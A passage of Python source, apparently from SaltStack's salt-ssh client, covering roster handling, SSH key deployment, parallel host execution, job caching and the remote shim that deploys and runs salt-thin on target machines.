salt.config.DEFAULT_MASTER_OPTS["ssh_identities_only"],
),
"remote_port_forwards": self.opts.get("ssh_remote_port_forwards"),
"ssh_options": self.opts.get("ssh_options"),
}
if self.opts.get("rand_thin_dir"):
self.defaults["thin_dir"] = os.path.join(
"/var/tmp", ".{0}".format(uuid.uuid4().hex[:6])
)
self.opts["ssh_wipe"] = "True"
self.serial = salt.payload.Serial(opts)
self.returners = salt.loader.returners(self.opts, {})
self.fsclient = salt.fileclient.FSClient(self.opts)
self.thin = salt.utils.thin.gen_thin(
self.opts["cachedir"],
extra_mods=self.opts.get("thin_extra_mods"),
overwrite=self.opts["regen_thin"],
python2_bin=self.opts["python2_bin"],
python3_bin=self.opts["python3_bin"],
extended_cfg=self.opts.get("ssh_ext_alternatives"),
)
self.mods = mod_data(self.fsclient)
def _get_roster(self):
"""
Read roster filename as a key to the data.
:return:
"""
roster_file = salt.roster.get_roster_file(self.opts)
if roster_file not in self.__parsed_rosters:
roster_data = compile_template(
roster_file,
salt.loader.render(self.opts, {}),
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
self.__parsed_rosters[roster_file] = roster_data
return roster_file
def _expand_target(self):
"""
Figures out if the target is a reachable host without wildcards, expands if any.
:return:
"""
# TODO: Support -L
target = self.opts["tgt"]
if isinstance(target, list):
return
hostname = self.opts["tgt"].split("@")[-1]
needs_expansion = (
"*" not in hostname
and salt.utils.network.is_reachable_host(hostname)
and salt.utils.network.is_ip(hostname)
)
if needs_expansion:
hostname = salt.utils.network.ip_to_host(hostname)
if hostname is None:
# Reverse lookup failed
return
self._get_roster()
for roster_filename in self.__parsed_rosters:
roster_data = self.__parsed_rosters[roster_filename]
if not isinstance(roster_data, bool):
for host_id in roster_data:
if hostname in [host_id, roster_data.get("host")]:
if hostname != self.opts["tgt"]:
self.opts["tgt"] = hostname
self.__parsed_rosters[self.ROSTER_UPDATE_FLAG] = False
return
def _update_roster(self):
"""
Update default flat roster with the passed in information.
:return:
"""
roster_file = self._get_roster()
if os.access(roster_file, os.W_OK):
if self.__parsed_rosters[self.ROSTER_UPDATE_FLAG]:
with salt.utils.files.fopen(roster_file, "a") as roster_fp:
roster_fp.write(
'# Automatically added by "{s_user}" at {s_time}\n{hostname}:\n host: '
"{hostname}\n user: {user}"
"\n passwd: {passwd}\n".format(
s_user=getpass.getuser(),
s_time=datetime.datetime.utcnow().isoformat(),
hostname=self.opts.get("tgt", ""),
user=self.opts.get("ssh_user", ""),
passwd=self.opts.get("ssh_passwd", ""),
)
)
log.info(
"The host {0} has been added to the roster {1}".format(
self.opts.get("tgt", ""), roster_file
)
)
else:
log.error("Unable to update roster {0}: access denied".format(roster_file))
def _update_targets(self):
"""
Uptade targets in case hostname was directly passed without the roster.
:return:
"""
hostname = self.opts.get("tgt", "")
if "@" in hostname:
user, hostname = hostname.split("@", 1)
else:
user = self.opts.get("ssh_user")
if hostname == "*":
hostname = ""
if salt.utils.network.is_reachable_host(hostname):
hostname = salt.utils.network.ip_to_host(hostname)
self.opts["tgt"] = hostname
self.targets[hostname] = {
"passwd": self.opts.get("ssh_passwd", ""),
"host": hostname,
"user": user,
}
if self.opts.get("ssh_update_roster"):
self._update_roster()
def get_pubkey(self):
"""
Return the key string for the SSH public key
"""
if (
"__master_opts__" in self.opts
and self.opts["__master_opts__"].get("ssh_use_home_key")
and os.path.isfile(os.path.expanduser("~/.ssh/id_rsa"))
):
priv = os.path.expanduser("~/.ssh/id_rsa")
else:
priv = self.opts.get(
"ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa")
)
pub = "{0}.pub".format(priv)
with salt.utils.files.fopen(pub, "r") as fp_:
return "{0} rsa root@master".format(fp_.read().split()[1])
def key_deploy(self, host, ret):
"""
Deploy the SSH key if the minions don't auth
"""
if not isinstance(ret[host], dict) or self.opts.get("ssh_key_deploy"):
target = self.targets[host]
if target.get("passwd", False) or self.opts["ssh_passwd"]:
self._key_deploy_run(host, target, False)
return ret
if ret[host].get("stderr", "").count("Permission denied"):
target = self.targets[host]
# permission denied, attempt to auto deploy ssh key
print(
(
"Permission denied for host {0}, do you want to deploy "
"the salt-ssh key? (password required):"
).format(host)
)
deploy = input("[Y/n] ")
if deploy.startswith(("n", "N")):
return ret
target["passwd"] = getpass.getpass(
"Password for {0}@{1}: ".format(target["user"], host)
)
return self._key_deploy_run(host, target, True)
return ret
def _key_deploy_run(self, host, target, re_run=True):
"""
The ssh-copy-id routine
"""
argv = [
"ssh.set_auth_key",
target.get("user", "root"),
self.get_pubkey(),
]
single = Single(
self.opts,
argv,
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
**target
)
if salt.utils.path.which("ssh-copy-id"):
# we have ssh-copy-id, use it!
stdout, stderr, retcode = single.shell.copy_id()
else:
stdout, stderr, retcode = single.run()
if re_run:
target.pop("passwd")
single = Single(
self.opts,
self.opts["argv"],
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
**target
)
stdout, stderr, retcode = single.cmd_block()
try:
data = salt.utils.json.find_json(stdout)
return {host: data.get("local", data)}
except Exception: # pylint: disable=broad-except
if stderr:
return {host: stderr}
return {host: "Bad Return"}
if salt.defaults.exitcodes.EX_OK != retcode:
return {host: stderr}
return {host: stdout}
def handle_routine(self, que, opts, host, target, mine=False):
"""
Run the routine in a "Thread", put a dict on the queue
"""
opts = copy.deepcopy(opts)
single = Single(
opts,
opts["argv"],
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
mine=mine,
**target
)
ret = {"id": single.id}
stdout, stderr, retcode = single.run()
# This job is done, yield
try:
data = salt.utils.json.find_json(stdout)
if len(data) < 2 and "local" in data:
ret["ret"] = data["local"]
else:
ret["ret"] = {
"stdout": stdout,
"stderr": stderr,
"retcode": retcode,
}
except Exception: # pylint: disable=broad-except
ret["ret"] = {
"stdout": stdout,
"stderr": stderr,
"retcode": retcode,
}
que.put(ret)
def handle_ssh(self, mine=False):
"""
Spin up the needed threads or processes and execute the subsequent
routines
"""
que = multiprocessing.Queue()
running = {}
target_iter = self.targets.__iter__()
returned = set()
rets = set()
init = False
while True:
if not self.targets:
log.error("No matching targets found in roster.")
break
if len(running) < self.opts.get("ssh_max_procs", 25) and not init:
try:
host = next(target_iter)
except StopIteration:
init = True
continue
for default in self.defaults:
if default not in self.targets[host]:
self.targets[host][default] = self.defaults[default]
if "host" not in self.targets[host]:
self.targets[host]["host"] = host
if self.targets[host].get("winrm") and not HAS_WINSHELL:
returned.add(host)
rets.add(host)
log_msg = "Please contact sales@saltstack.com for access to the enterprise saltwinshell module."
log.debug(log_msg)
no_ret = {
"fun_args": [],
"jid": None,
"return": log_msg,
"retcode": 1,
"fun": "",
"id": host,
}
yield {host: no_ret}
continue
args = (
que,
self.opts,
host,
self.targets[host],
mine,
)
routine = Process(target=self.handle_routine, args=args)
routine.start()
running[host] = {"thread": routine}
continue
ret = {}
try:
ret = que.get(False)
if "id" in ret:
returned.add(ret["id"])
yield {ret["id"]: ret["ret"]}
except Exception: # pylint: disable=broad-except
# This bare exception is here to catch spurious exceptions
# thrown by que.get during healthy operation. Please do not
# worry about this bare exception, it is entirely here to
# control program flow.
pass
for host in running:
if not running[host]["thread"].is_alive():
if host not in returned:
# Try to get any returns that came through since we
# last checked
try:
while True:
ret = que.get(False)
if "id" in ret:
returned.add(ret["id"])
yield {ret["id"]: ret["ret"]}
except Exception: # pylint: disable=broad-except
pass
if host not in returned:
error = (
"Target '{0}' did not return any data, "
"probably due to an error."
).format(host)
ret = {"id": host, "ret": error}
log.error(error)
yield {ret["id"]: ret["ret"]}
running[host]["thread"].join()
rets.add(host)
for host in rets:
if host in running:
running.pop(host)
if len(rets) >= len(self.targets):
break
# Sleep when limit or all threads started
if len(running) >= self.opts.get("ssh_max_procs", 25) or len(
self.targets
) >= len(running):
time.sleep(0.1)
def run_iter(self, mine=False, jid=None):
"""
Execute and yield returns as they come in, do not print to the display
mine
The Single objects will use mine_functions defined in the roster,
pillar, or master config (they will be checked in that order) and
will modify the argv with the arguments from mine_functions
"""
fstr = "{0}.prep_jid".format(self.opts["master_job_cache"])
jid = self.returners[fstr](passed_jid=jid or self.opts.get("jid", None))
# Save the invocation information
argv = self.opts["argv"]
if self.opts.get("raw_shell", False):
fun = "ssh._raw"
args = argv
else:
fun = argv[0] if argv else ""
args = argv[1:]
job_load = {
"jid": jid,
"tgt_type": self.tgt_type,
"tgt": self.opts["tgt"],
"user": self.opts["user"],
"fun": fun,
"arg": args,
}
# save load to the master job cache
if self.opts["master_job_cache"] == "local_cache":
self.returners["{0}.save_load".format(self.opts["master_job_cache"])](
jid, job_load, minions=self.targets.keys()
)
else:
self.returners["{0}.save_load".format(self.opts["master_job_cache"])](
jid, job_load
)
for ret in self.handle_ssh(mine=mine):
host = next(six.iterkeys(ret))
self.cache_job(jid, host, ret[host], fun)
if self.event:
id_, data = next(six.iteritems(ret))
if isinstance(data, six.text_type):
data = {"return": data}
if "id" not in data:
data["id"] = id_
data[
"jid"
] = jid # make the jid in the payload the same as the jid in the tag
self.event.fire_event(
data, salt.utils.event.tagify([jid, "ret", host], "job")
)
yield ret
def cache_job(self, jid, id_, ret, fun):
"""
Cache the job information
"""
self.returners["{0}.returner".format(self.opts["master_job_cache"])](
{"jid": jid, "id": id_, "return": ret, "fun": fun}
)
def run(self, jid=None):
"""
Execute the overall routine, print results via outputters
"""
if self.opts.get("list_hosts"):
self._get_roster()
ret = {}
for roster_file in self.__parsed_rosters:
if roster_file.startswith("#"):
continue
ret[roster_file] = {}
for host_id in self.__parsed_rosters[roster_file]:
hostname = self.__parsed_rosters[roster_file][host_id]["host"]
ret[roster_file][host_id] = hostname
salt.output.display_output(ret, "nested", self.opts)
sys.exit()
fstr = "{0}.prep_jid".format(self.opts["master_job_cache"])
jid = self.returners[fstr](passed_jid=jid or self.opts.get("jid", None))
# Save the invocation information
argv = self.opts["argv"]
if self.opts.get("raw_shell", False):
fun = "ssh._raw"
args = argv
else:
fun = argv[0] if argv else ""
args = argv[1:]
job_load = {
"jid": jid,
"tgt_type": self.tgt_type,
"tgt": self.opts["tgt"],
"user": self.opts["user"],
"fun": fun,
"arg": args,
}
# save load to the master job cache
try:
if isinstance(jid, bytes):
jid = jid.decode("utf-8")
if self.opts["master_job_cache"] == "local_cache":
self.returners["{0}.save_load".format(self.opts["master_job_cache"])](
jid, job_load, minions=self.targets.keys()
)
else:
self.returners["{0}.save_load".format(self.opts["master_job_cache"])](
jid, job_load
)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
log.error(
"Could not save load with returner %s: %s",
self.opts["master_job_cache"],
exc,
)
if self.opts.get("verbose"):
msg = "Executing job with jid {0}".format(jid)
print(msg)
print("-" * len(msg) + "\n")
print("")
sret = {}
outputter = self.opts.get("output", "nested")
final_exit = 0
for ret in self.handle_ssh():
host = next(six.iterkeys(ret))
if isinstance(ret[host], dict):
host_ret = ret[host].get("retcode", 0)
if host_ret != 0:
final_exit = 1
else:
# Error on host
final_exit = 1
self.cache_job(jid, host, ret[host], fun)
ret = self.key_deploy(host, ret)
if isinstance(ret[host], dict) and (
ret[host].get("stderr") or ""
).startswith("ssh:"):
ret[host] = ret[host]["stderr"]
if not isinstance(ret[host], dict):
p_data = {host: ret[host]}
elif "return" not in ret[host]:
p_data = ret
else:
outputter = ret[host].get("out", self.opts.get("output", "nested"))
p_data = {host: ret[host].get("return", {})}
if self.opts.get("static"):
sret.update(p_data)
else:
salt.output.display_output(p_data, outputter, self.opts)
if self.event:
id_, data = next(six.iteritems(ret))
if isinstance(data, six.text_type):
data = {"return": data}
if "id" not in data:
data["id"] = id_
data[
"jid"
] = jid # make the jid in the payload the same as the jid in the tag
self.event.fire_event(
data, salt.utils.event.tagify([jid, "ret", host], "job")
)
if self.opts.get("static"):
salt.output.display_output(sret, outputter, self.opts)
if final_exit:
sys.exit(salt.defaults.exitcodes.EX_AGGREGATE)
class Single(object):
"""
Hold onto a single ssh execution
"""
# 1. Get command ready
# 2. Check if target has salt
# 3. deploy salt-thin
# 4. execute requested command via salt-thin
def __init__(
self,
opts,
argv,
id_,
host,
user=None,
port=None,
passwd=None,
priv=None,
priv_passwd=None,
timeout=30,
sudo=False,
tty=False,
mods=None,
fsclient=None,
thin=None,
mine=False,
minion_opts=None,
identities_only=False,
sudo_user=None,
remote_port_forwards=None,
winrm=False,
ssh_options=None,
**kwargs
):
# Get mine setting and mine_functions if defined in kwargs (from roster)
self.mine = mine
self.mine_functions = kwargs.get("mine_functions")
self.cmd_umask = kwargs.get("cmd_umask", None)
self.winrm = winrm
self.opts = opts
self.tty = tty
if kwargs.get("disable_wipe"):
self.wipe = False
else:
self.wipe = bool(self.opts.get("ssh_wipe"))
if kwargs.get("thin_dir"):
self.thin_dir = kwargs["thin_dir"]
elif self.winrm:
saltwinshell.set_winvars(self)
self.python_env = kwargs.get("ssh_python_env")
else:
if user:
thin_dir = DEFAULT_THIN_DIR.replace("%%USER%%", user)
else:
thin_dir = DEFAULT_THIN_DIR.replace("%%USER%%", "root")
self.thin_dir = thin_dir.replace(
"%%FQDNUUID%%",
uuid.uuid3(uuid.NAMESPACE_DNS, salt.utils.network.get_fqhostname()).hex[
:6
],
)
self.opts["thin_dir"] = self.thin_dir
self.fsclient = fsclient
self.context = {"master_opts": self.opts, "fileclient": self.fsclient}
self.ssh_pre_flight = kwargs.get("ssh_pre_flight", None)
if self.ssh_pre_flight:
self.ssh_pre_file = os.path.basename(self.ssh_pre_flight)
if isinstance(argv, six.string_types):
self.argv = [argv]
else:
self.argv = argv
self.fun, self.args, self.kwargs = self.__arg_comps()
self.id = id_
self.set_path = kwargs.get("set_path", "")
self.mods = mods if isinstance(mods, dict) else {}
args = {
"host": host,
"user": user,
"port": port,
"passwd": passwd,
"priv": priv,
"priv_passwd": priv_passwd,
"timeout": timeout,
"sudo": sudo,
"tty": tty,
"mods": self.mods,
"identities_only": identities_only,
"sudo_user": sudo_user,
"remote_port_forwards": remote_port_forwards,
"winrm": winrm,
"ssh_options": ssh_options,
}
# Pre apply changeable defaults
self.minion_opts = {
"grains_cache": True,
"log_file": "salt-call.log",
}
self.minion_opts.update(opts.get("ssh_minion_opts", {}))
if minion_opts is not None:
self.minion_opts.update(minion_opts)
# Post apply system needed defaults
self.minion_opts.update(
{
"root_dir": os.path.join(self.thin_dir, "running_data"),
"id": self.id,
"sock_dir": "/",
"fileserver_list_cache_time": 3,
}
)
self.minion_config = salt.serializers.yaml.serialize(self.minion_opts)
self.target = kwargs
self.target.update(args)
self.serial = salt.payload.Serial(opts)
self.wfuncs = salt.loader.ssh_wrapper(opts, None, self.context)
self.shell = salt.client.ssh.shell.gen_shell(opts, **args)
if self.winrm:
# Determine if Windows client is x86 or AMD64
arch, _, _ = self.shell.exec_cmd("powershell $ENV:PROCESSOR_ARCHITECTURE")
self.arch = arch.strip()
self.thin = thin if thin else salt.utils.thin.thin_path(opts["cachedir"])
def __arg_comps(self):
"""
Return the function name and the arg list
"""
fun = self.argv[0] if self.argv else ""
parsed = salt.utils.args.parse_input(
self.argv[1:], condition=False, no_parse=self.opts.get("no_parse", [])
)
args = parsed[0]
kws = parsed[1]
return fun, args, kws
def _escape_arg(self, arg):
"""
Properly escape argument to protect special characters from shell
interpretation. This avoids having to do tricky argument quoting.
Effectively just escape all characters in the argument that are not
alphanumeric!
"""
if self.winrm:
return arg
return "".join(["\\" + char if re.match(r"\W", char) else char for char in arg])
def run_ssh_pre_flight(self):
"""
Run our pre_flight script before running any ssh commands
"""
script = os.path.join(tempfile.gettempdir(), self.ssh_pre_file)
self.shell.send(self.ssh_pre_flight, script)
return self.execute_script(script)
def check_thin_dir(self):
"""
check if the thindir exists on the remote machine
"""
stdout, stderr, retcode = self.shell.exec_cmd(
"test -d {0}".format(self.thin_dir)
)
if retcode != 0:
return False
return True
def deploy(self):
"""
Deploy salt-thin
"""
self.shell.send(
self.thin, os.path.join(self.thin_dir, "salt-thin.tgz"),
)
self.deploy_ext()
return True
def deploy_ext(self):
"""
Deploy the ext_mods tarball
"""
if self.mods.get("file"):
self.shell.send(
self.mods["file"], os.path.join(self.thin_dir, "salt-ext_mods.tgz"),
)
return True
def run(self, deploy_attempted=False):
"""
Execute the routine, the routine can be either:
1. Execute a raw shell command
2. Execute a wrapper func
3. Execute a remote Salt command
If a (re)deploy is needed, then retry the operation after a deploy
attempt
Returns tuple of (stdout, stderr, retcode)
"""
stdout = stderr = retcode = None
if self.ssh_pre_flight:
if not self.opts.get("ssh_run_pre_flight", False) and self.check_thin_dir():
log.info(
"{0} thin dir already exists. Not running ssh_pre_flight script".format(
self.thin_dir
)
)
elif not os.path.exists(self.ssh_pre_flight):
log.error(
"The ssh_pre_flight script {0} does not exist".format(
self.ssh_pre_flight
)
)
else:
stdout, stderr, retcode = self.run_ssh_pre_flight()
if stderr:
log.error(
"Error running ssh_pre_flight script {0}".format(
self.ssh_pre_file
)
)
return stdout, stderr, retcode
log.info(
"Successfully ran the ssh_pre_flight script: {0}".format(
self.ssh_pre_file
)
)
if self.opts.get("raw_shell", False):
cmd_str = " ".join([self._escape_arg(arg) for arg in self.argv])
stdout, stderr, retcode = self.shell.exec_cmd(cmd_str)
elif self.fun in self.wfuncs or self.mine:
stdout, retcode = self.run_wfunc()
else:
stdout, stderr, retcode = self.cmd_block()
return stdout, stderr, retcode
def run_wfunc(self):
"""
Execute a wrapper function
Returns tuple of (json_data, '')
"""
# Ensure that opts/grains are up to date
# Execute routine
data_cache = False
data = None
cdir = os.path.join(self.opts["cachedir"], "minions", self.id)
if not os.path.isdir(cdir):
os.makedirs(cdir)
datap = os.path.join(cdir, "ssh_data.p")
refresh = False
if not os.path.isfile(datap):
refresh = True
else:
passed_time = (time.time() - os.stat(datap).st_mtime) / 60
if passed_time > self.opts.get("cache_life", 60):
refresh = True
if self.opts.get("refresh_cache"):
refresh = True
conf_grains = {}
# Save conf file grains before they get clobbered
if "ssh_grains" in self.opts:
conf_grains = self.opts["ssh_grains"]
if not data_cache:
refresh = True
if refresh:
# Make the datap
# TODO: Auto expire the datap
pre_wrapper = salt.client.ssh.wrapper.FunctionWrapper(
self.opts,
self.id,
fsclient=self.fsclient,
minion_opts=self.minion_opts,
**self.target
)
opts_pkg = pre_wrapper["test.opts_pkg"]() # pylint: disable=E1102
if "_error" in opts_pkg:
# Refresh failed
retcode = opts_pkg["retcode"]
ret = salt.utils.json.dumps({"local": opts_pkg})
return ret, retcode
opts_pkg["file_roots"] = self.opts["file_roots"]
opts_pkg["pillar_roots"] = self.opts["pillar_roots"]
opts_pkg["ext_pillar"] = self.opts["ext_pillar"]
opts_pkg["extension_modules"] = self.opts["extension_modules"]
opts_pkg["module_dirs"] = self.opts["module_dirs"]
opts_pkg["_ssh_version"] = self.opts["_ssh_version"]
opts_pkg["__master_opts__"] = self.context["master_opts"]
if "known_hosts_file" in self.opts:
opts_pkg["known_hosts_file"] = self.opts["known_hosts_file"]
if "_caller_cachedir" in self.opts:
opts_pkg["_caller_cachedir"] = self.opts["_caller_cachedir"]
else:
opts_pkg["_caller_cachedir"] = self.opts["cachedir"]
# Use the ID defined in the roster file
opts_pkg["id"] = self.id
retcode = 0
# Restore master grains
for grain in conf_grains:
opts_pkg["grains"][grain] = conf_grains[grain]
# Enable roster grains support
if "grains" in self.target:
for grain in self.target["grains"]:
opts_pkg["grains"][grain] = self.target["grains"][grain]
popts = {}
popts.update(opts_pkg["__master_opts__"])
popts.update(opts_pkg)
pillar = salt.pillar.Pillar(
popts,
opts_pkg["grains"],
opts_pkg["id"],
opts_pkg.get("saltenv", "base"),
)
pillar_data = pillar.compile_pillar()
# TODO: cache minion opts in datap in master.py
data = {
"opts": opts_pkg,
"grains": opts_pkg["grains"],
"pillar": pillar_data,
}
if data_cache:
with salt.utils.files.fopen(datap, "w+b") as fp_:
fp_.write(self.serial.dumps(data))
if not data and data_cache:
with salt.utils.files.fopen(datap, "rb") as fp_:
data = self.serial.load(fp_)
opts = data.get("opts", {})
opts["grains"] = data.get("grains")
# Restore master grains
for grain in conf_grains:
opts["grains"][grain] = conf_grains[grain]
# Enable roster grains support
if "grains" in self.target:
for grain in self.target["grains"]:
opts["grains"][grain] = self.target["grains"][grain]
opts["pillar"] = data.get("pillar")
wrapper = salt.client.ssh.wrapper.FunctionWrapper(
opts,
self.id,
fsclient=self.fsclient,
minion_opts=self.minion_opts,
**self.target
)
self.wfuncs = salt.loader.ssh_wrapper(opts, wrapper, self.context)
wrapper.wfuncs = self.wfuncs
# We're running in the mine, need to fetch the arguments from the
# roster, pillar, master config (in that order)
if self.mine:
mine_args = None
mine_fun_data = None
mine_fun = self.fun
if self.mine_functions and self.fun in self.mine_functions:
mine_fun_data = self.mine_functions[self.fun]
elif opts["pillar"] and self.fun in opts["pillar"].get(
"mine_functions", {}
):
mine_fun_data = opts["pillar"]["mine_functions"][self.fun]
elif self.fun in self.context["master_opts"].get("mine_functions", {}):
mine_fun_data = self.context["master_opts"]["mine_functions"][self.fun]
if isinstance(mine_fun_data, dict):
mine_fun = mine_fun_data.pop("mine_function", mine_fun)
mine_args = mine_fun_data
elif isinstance(mine_fun_data, list):
for item in mine_fun_data[:]:
if isinstance(item, dict) and "mine_function" in item:
mine_fun = item["mine_function"]
mine_fun_data.pop(mine_fun_data.index(item))
mine_args = mine_fun_data
else:
mine_args = mine_fun_data
# If we found mine_args, replace our command's args
if isinstance(mine_args, dict):
self.args = []
self.kwargs = mine_args
elif isinstance(mine_args, list):
self.args = mine_args
self.kwargs = {}
try:
if self.mine:
result = wrapper[mine_fun](*self.args, **self.kwargs)
else:
result = self.wfuncs[self.fun](*self.args, **self.kwargs)
except TypeError as exc:
result = "TypeError encountered executing {0}: {1}".format(self.fun, exc)
log.error(result, exc_info_on_loglevel=logging.DEBUG)
retcode = 1
except Exception as exc: # pylint: disable=broad-except
result = "An Exception occurred while executing {0}: {1}".format(
self.fun, exc
)
log.error(result, exc_info_on_loglevel=logging.DEBUG)
retcode = 1
# Mimic the json data-structure that "salt-call --local" will
# emit (as seen in ssh_py_shim.py)
if isinstance(result, dict) and "local" in result:
ret = salt.utils.json.dumps({"local": result["local"]})
else:
ret = salt.utils.json.dumps({"local": {"return": result}})
return ret, retcode
def _cmd_str(self):
"""
Prepare the command string
"""
sudo = "sudo" if self.target["sudo"] else ""
sudo_user = self.target["sudo_user"]
if "_caller_cachedir" in self.opts:
cachedir = self.opts["_caller_cachedir"]
else:
cachedir = self.opts["cachedir"]
thin_code_digest, thin_sum = salt.utils.thin.thin_sum(cachedir, "sha1")
debug = ""
if not self.opts.get("log_level"):
self.opts["log_level"] = "info"
if (
salt.log.LOG_LEVELS["debug"]
>= salt.log.LOG_LEVELS[self.opts.get("log_level", "info")]
):
debug = "1"
arg_str = '''
OPTIONS.config = \
"""
{config}
"""
OPTIONS.delimiter = '{delimeter}'
OPTIONS.saltdir = '{saltdir}'
OPTIONS.checksum = '{checksum}'
OPTIONS.hashfunc = '{hashfunc}'
OPTIONS.version = '{version}'
OPTIONS.ext_mods = '{ext_mods}'
OPTIONS.wipe = {wipe}
OPTIONS.tty = {tty}
OPTIONS.cmd_umask = {cmd_umask}
OPTIONS.code_checksum = {code_checksum}
ARGS = {arguments}\n'''.format(
config=self.minion_config,
delimeter=RSTR,
saltdir=self.thin_dir,
checksum=thin_sum,
hashfunc="sha1",
version=salt.version.__version__,
ext_mods=self.mods.get("version", ""),
wipe=self.wipe,
tty=self.tty,
cmd_umask=self.cmd_umask,
code_checksum=thin_code_digest,
arguments=self.argv,
)
py_code = SSH_PY_SHIM.replace("#%%OPTS", arg_str)
if six.PY2:
py_code_enc = py_code.encode("base64")
else:
py_code_enc = base64.encodebytes(py_code.encode("utf-8")).decode("utf-8")
if not self.winrm:
cmd = SSH_SH_SHIM.format(
DEBUG=debug,
SUDO=sudo,
SUDO_USER=sudo_user,
SSH_PY_CODE=py_code_enc,
HOST_PY_MAJOR=sys.version_info[0],
SET_PATH=self.set_path,
)
else:
cmd = saltwinshell.gen_shim(py_code_enc)
return cmd
def execute_script(self, script, extension="py", pre_dir=""):
"""
execute a script on the minion then delete
"""
if extension == "ps1":
ret = self.shell.exec_cmd('"powershell {0}"'.format(script))
else:
if not self.winrm:
ret = self.shell.exec_cmd("/bin/sh '{0}{1}'".format(pre_dir, script))
else:
ret = saltwinshell.call_python(self, script)
# Remove file from target system
if not self.winrm:
self.shell.exec_cmd("rm '{0}{1}'".format(pre_dir, script))
else:
self.shell.exec_cmd("del {0}".format(script))
return ret
def shim_cmd(self, cmd_str, extension="py"):
"""
Run a shim command.
If tty is enabled, we must scp the shim to the target system and
execute it there
"""
if not self.tty and not self.winrm:
return self.shell.exec_cmd(cmd_str)
# Write the shim to a temporary file in the default temp directory
with tempfile.NamedTemporaryFile(
mode="w+b", prefix="shim_", delete=False
) as shim_tmp_file:
shim_tmp_file.write(salt.utils.stringutils.to_bytes(cmd_str))
# Copy shim to target system, under $HOME/.<randomized name>
target_shim_file = ".{0}.{1}".format(
binascii.hexlify(os.urandom(6)).decode("ascii"), extension
)
if self.winrm:
target_shim_file = saltwinshell.get_target_shim_file(self, target_shim_file)
self.shell.send(shim_tmp_file.name, target_shim_file, makedirs=True)
# Remove our shim file
try:
os.remove(shim_tmp_file.name)
except IOError:
pass
ret = self.execute_script(script=target_shim_file, extension=extension)
return ret
def cmd_block(self, is_retry=False):
"""
Prepare the pre-check command to send to the subsystem
1. execute SHIM + command
2. check if SHIM returns a master request or if it completed
3. handle any master request
4. re-execute SHIM + command
5. split SHIM results from command results
6. return command results
"""
self.argv = _convert_args(self.argv)
log.debug(
"Performing shimmed, blocking command as follows:\n%s",
" ".join([six.text_type(arg) for arg in self.argv]),
)
cmd_str = self._cmd_str()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
log.trace("STDOUT %s\n%s", self.target["host"], stdout)
log.trace("STDERR %s\n%s", self.target["host"], stderr)
log.debug("RETCODE %s: %s", self.target["host"], retcode)
error = self.categorize_shim_errors(stdout, stderr, retcode)
if error:
if error == "Python environment not found on Windows system":
saltwinshell.deploy_python(self)
stdout, stderr, retcode = self.shim_cmd(cmd_str)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
elif error == "Undefined SHIM state":
self.deploy()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
return (
"ERROR: Failure deploying thin, undefined state: {0}".format(
stdout
),
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
else:
return "ERROR: {0}".format(error), stderr, retcode
# FIXME: this discards output from ssh_shim if the shim succeeds. It should
# always save the shim output regardless of shim success or failure.
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
if re.search(RSTR_RE, stderr):
# Found RSTR in stderr which means SHIM completed and only
# and remaining output is only from salt.
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
else:
# RSTR was found in stdout but not stderr - which means there
# is a SHIM command for the master.
shim_command = re.split(r"\r?\n", stdout, 1)[0].strip()
log.debug("SHIM retcode(%s) and command: %s", retcode, shim_command)
if (
"deploy" == shim_command
and retcode == salt.defaults.exitcodes.EX_THIN_DEPLOY
):
self.deploy()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
if not self.tty:
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
log.error(
"ERROR: Failure deploying thin, retrying:\n"
"STDOUT:\n%s\nSTDERR:\n%s\nRETCODE: %s",
stdout,
stderr,
retcode,
)
return self.cmd_block()
elif not re.search(RSTR_RE, stdout):
# If RSTR is not seen in stdout with tty, then there
# was a thin deployment problem.
log.error(
"ERROR: Failure deploying thin, retrying:\n"
"STDOUT:\n%s\nSTDERR:\n%s\nRETCODE: %s",
stdout,
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
if self.tty:
stderr = ""
else:
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
elif "ext_mods" == shim_command:
self.deploy_ext()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
return (
"ERROR: Failure deploying ext_mods: {0}".format(stdout),
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
return stdout, stderr, retcode
def categorize_shim_errors(self, stdout_bytes, stderr_bytes, retcode):
stdout = salt.utils.stringutils.to_unicode(stdout_bytes)
stderr = salt.utils.stringutils.to_unicode(stderr_bytes)
if re.search(RSTR_RE, stdout) and stdout != RSTR + "\n":
# RSTR was found in stdout which means that the shim
# functioned without *errors* . . . but there may be shim
# commands, unless the only thing we found is RSTR
return None
if re.search(RSTR_RE, stderr):
# Undefined state
return "Undefined SHIM state"
if stderr.startswith("Permission denied"):
# SHIM was not even reached
return None
perm_error_fmt = (
"Permissions problem, target user may need " "to be root or use sudo:\n {0}"
)
def _version_mismatch_error():
messages = {
